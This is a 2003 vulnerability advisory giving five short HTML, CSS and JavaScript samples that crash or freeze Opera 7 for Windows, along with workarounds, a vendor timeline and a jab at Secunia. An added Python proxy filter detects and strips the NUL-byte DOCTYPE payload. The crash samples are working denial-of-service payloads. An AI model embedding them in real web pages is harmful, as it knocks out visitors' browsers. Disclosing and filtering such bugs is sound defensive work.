---------------------------------------------------------------------------------
TITLE          : [Opera 7] Five DoS codes on general web sites
                 -= Fastest browser on earth, Fastest crash on earth too =-
PRODUCT        : Opera for Windows
VERSIONS       : 7.11b build 2887
                 7.11 build 2880
                 7.10 build 2840
                 7.03 build 2670
VENDOR         : Opera Software ASA (http://www.opera.com/)
SEVERITY       : Medium.
                 Abnormal Termination, Freeze, and DoS attacks.
DISCOVERED BY  : imagine, nesumin
AUTHOR         : :: Operash ::
REPORTED DATE  : 2003-06-24
PUBLISHED DATE : 2003-07-01
---------------------------------------------------------------------------------

0. PRODUCT INFORMATION
========================

 Opera for Windows is a GUI-based web browser.

 Opera Software ASA (http://www.opera.com/)

1. DESCRIPTION
================

 There are many unfixed bugs that cause abnormal termination or a freeze
 in Opera 7. By exploiting these bugs, attackers can carry out DoS attacks.

 The following are 5 sample codes, which are in general web sites.

2. SAMPLE CODE & IMPACT
=========================

 [ CODE 1 ]

 Just 12 bytes of data, "<!DOCTYPE" + NULL(\x00) + 1 byte + ">", make CPU
 usage go up to 100% (depending on the computer's specs), and the computer
 freezes.

 -----------------------------------------------------------------
 <!DOCTYPE[\x00]A>
 -----------------------------------------------------------------

 [ CODE 2 ]

 Abnormal termination is caused.

 -----------------------------------------------------------------
 <form></form><script>document.forms[0].submit()</script>
 -----------------------------------------------------------------

 [ CODE 3 ]

 Abnormal termination is caused.

 -----------------------------------------------------------------
 <table>
 <tr id="crash" style="display:inline"><td>
 <script>crash.style.display = "none";</script>
 </td></tr>
 </table>
 -----------------------------------------------------------------

 [ CODE 4 ]

 Abnormal termination is caused.

 -----------------------------------------------------------------
 <table>
 <map id="crash" style="position:absolute"></map>
 <script>crash.style.height = crash.style.width = '0';</script>
 </table>
 -----------------------------------------------------------------

 [ CODE 5 ]

 CPU usage goes up to 100% (depending on the computer's specs), and the
 computer freezes.

 -----------------------------------------------------------------
 <html>
 <head>
 <style type="text/css">
 <!--
 .aaaaa:after{content:"A";display:block}
 .bbbbb{display:run-in}
 .ccccc{display:inline-block}
 //-->
 </style>
 </head>
 <body>
 <div class="aaaaa">
 <div class="bbbbb">
 <div class="ccccc">
 </div>
 </div>
 </div>
 </body>
 </html>
 -----------------------------------------------------------------

3. SYSTEMS AFFECTED
=====================

 Opera (For Windows)
   7.11b build 2887
   7.11 build 2880
   7.10 build 2840
   7.03 build 2670 (except [ CODE 5 ])

 Versions lower than 7.03 might be affected too (not tested).

4. EXAMINES
=============

 Opera (For Windows, English/Japanese) :
   7.11b build 2887
   7.11 build 2880
   7.10 build 2840
   7.03 build 2670

 Platform :
   Windows 98SE Japanese Edition
   Windows 2000 Pro SP3 Japanese Edition

5. WORKAROUND
===============

 [ CODE 1 ] -----
 [ CODE 2 ] Disable "JavaScript"
 [ CODE 3 ] Disable "JavaScript"
 [ CODE 4 ] Disable "JavaScript"
 [ CODE 5 ] Disable "CSS Author mode"

6. TIME TABLE & VENDOR STATUS
===============================

 2003-06-24 Reported to vendor.
 2003-07-01 Released this advisory.

 No reply from vendor.

7. DISCLAIMER
===============

 A. We cannot guarantee the accuracy of all statements in this information.
 B. We do not anticipate issuing updated versions of this information
    unless there is some material change in the facts.
 C. And we will take no responsibility for any kind of disadvantage
    caused by using this information.
 D. You can quote this advisory without our permission if you keep the
    following;
    a. Do not distort this advisory's content.
    b. A quoted place should be a medium on the Internet.
 E. If you have any questions, please contact us.

 * Exception
   We strictly forbid 'Secunia' to republish or redistribute our advisory.

   ...Well, even so, we know this request would be ignored.
   The CTO of Secunia has told us;
   "If you do not want us to write about your vulnerabilities - then
    stop posting them!"
   Well.. We can do nothing for this sort of arrogance :/

8. CONTACT, ETC
=================

 :: Operash ::

 imagine (Operash Webmaster)
 nesumin <nesumin@softhome.net>

 Thanks to :
   melorin
   piso(sexy)
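
Section 5 lists no workaround for [ CODE 1 ]. The following is an added example, not part of the original advisory or any Opera code: a content check that a filtering proxy could run on HTML responses to flag, and strip, a NUL byte inside a DOCTYPE declaration. The function names and the proxy hook are hypothetical, the sample inputs are constructed, and it is an assumption (not tested against Opera) that removing the NUL byte avoids the hang.

```python
import re

# A DOCTYPE declaration up to its closing '>', matched on raw bytes so that
# control bytes inside it are still visible to the check.
_DOCTYPE = re.compile(rb"<!DOCTYPE[^>]*>", re.IGNORECASE)
_HTML_TYPES = ("text/html", "application/xhtml+xml")


def find_nul_doctypes(body: bytes) -> list[tuple[int, bytes]]:
    """Return (offset, declaration) for each DOCTYPE declaration holding a NUL."""
    return [(m.start(), m.group(0))
            for m in _DOCTYPE.finditer(body)
            if b"\x00" in m.group(0)]


def neutralise(body: bytes) -> bytes:
    """Remove NUL bytes inside DOCTYPE declarations; leave all other bytes alone."""
    return _DOCTYPE.sub(lambda m: m.group(0).replace(b"\x00", b""), body)


def filter_response(content_type: str, body: bytes) -> tuple[bytes, list[int]]:
    """Hypothetical proxy hook: returns the body to forward and the flagged offsets."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type not in _HTML_TYPES:
        return body, []          # binary downloads legitimately contain NULs
    hits = find_nul_doctypes(body)
    return (neutralise(body) if hits else body), [off for off, _ in hits]


# Constructed sample inputs.
SAMPLE_CODE1 = b"<!DOCTYPE\x00A>"        # the 12-byte pattern from [ CODE 1 ]
SAMPLE_CLEAN = b"<!doctype html><html><body>ok</body></html>"
SAMPLE_MIXED = b"<html><!-- x --><!DocType\x00A><p>text</p></html>"

if __name__ == "__main__":
    for name, data in [("code1", SAMPLE_CODE1),
                       ("clean", SAMPLE_CLEAN),
                       ("mixed", SAMPLE_MIXED)]:
        out, offsets = filter_response("text/html; charset=utf-8", data)
        print(name, offsets, out)
```

The check is limited to HTML media types and to the DOCTYPE declaration itself, so a NUL byte elsewhere in a page or in a binary download is not rewritten.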